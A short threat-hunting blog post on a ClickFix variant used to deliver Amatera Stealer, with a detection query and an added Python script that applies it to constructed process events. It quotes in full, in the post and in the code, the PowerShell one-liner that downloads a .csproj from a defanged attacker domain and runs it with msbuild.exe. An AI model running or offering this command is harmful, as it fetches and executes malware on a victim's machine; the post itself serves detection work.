172. Another Curious ClickFix PowerShell Command

Hello everyone! I think everybody already knows about the ClickFix technique, but we still see new variations, especially when it comes to the command a victim is asked to paste. Proofpoint has published a report on Amatera Stealer, and the adversary leveraged ClickFix to deliver it. The victim is expected to paste the following command into the Windows Run dialog:

powershell -w h -c "$p=$env:TEMP+'\t.csproj';irm https://cv[.]cbrw[.]ru/t.csproj -o $p;&($env:SystemRoot+'\Microsoft.NET\Framework\v4.0.30319\msbuild.exe') $p"

The threat actors abuse PowerShell to download a malicious C# project file from a remote server, save it to the temporary directory, and execute it using msbuild.exe. So, as always, we can use suspicious command line arguments for detection, for example:

event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: (*msbuild* AND *csproj*)

See you tomorrow!
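Here is the same rule as runnable detection logic over a few constructed process-creation events, plus the enrichment an analyst wants on a hit (download URL, hidden window, download cmdlet). This is an added example, not part of the original post or the Proofpoint report; the event field names follow the query above, and the sample events are made up.

```python
import re

# Constructed sample process-creation events (not real telemetry); field names
# follow the query on the page: event_type, proc_file_name, cmdline.
CLICKFIX_CMD = (
    "powershell -w h -c \"$p=$env:TEMP+'\\t.csproj';"
    "irm https://cv[.]cbrw[.]ru/t.csproj -o $p;"
    "&($env:SystemRoot+'\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe') $p\""
)
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe", "cmdline": CLICKFIX_CMD},
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": "powershell -File C:\\Scripts\\nightly-backup.ps1"},
    # Developer build: msbuild.exe is the process itself, not a PowerShell command line.
    {"event_type": "processcreatewin", "proc_file_name": "msbuild.exe",
     "cmdline": "msbuild.exe C:\\src\\app\\app.csproj /t:Build"},
    # Right strings, wrong event type: the rule is scoped to process creation.
    {"event_type": "filecreatewin", "proc_file_name": "powershell.exe",
     "cmdline": "powershell msbuild demo.csproj"},
]

URL_RE = re.compile(r"https?://[^\s'\";]+", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
IRM_RE = re.compile(r"\b(?:irm|invoke-restmethod)\b", re.I)

def matches_rule(event):
    """Port of the page's query: a powershell.exe process creation whose
    command line contains both 'msbuild' and 'csproj' (case-insensitive)."""
    if event.get("event_type") != "processcreatewin":
        return False
    if event.get("proc_file_name", "").lower() != "powershell.exe":
        return False
    cmd = event.get("cmdline", "").lower()
    return "msbuild" in cmd and "csproj" in cmd

def enrich(event):
    """Pull the fields an analyst triages first out of a matching command line."""
    cmd = event["cmdline"]
    url = URL_RE.search(cmd)
    return {
        "download_url": url.group(0) if url else None,
        "hidden_window": bool(HIDDEN_RE.search(cmd)),
        "uses_irm": bool(IRM_RE.search(cmd)),
        "cmdline": cmd,
    }

def hunt(events):
    """Apply the rule to a batch of events and return enriched hits."""
    return [enrich(e) for e in events if matches_rule(e)]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```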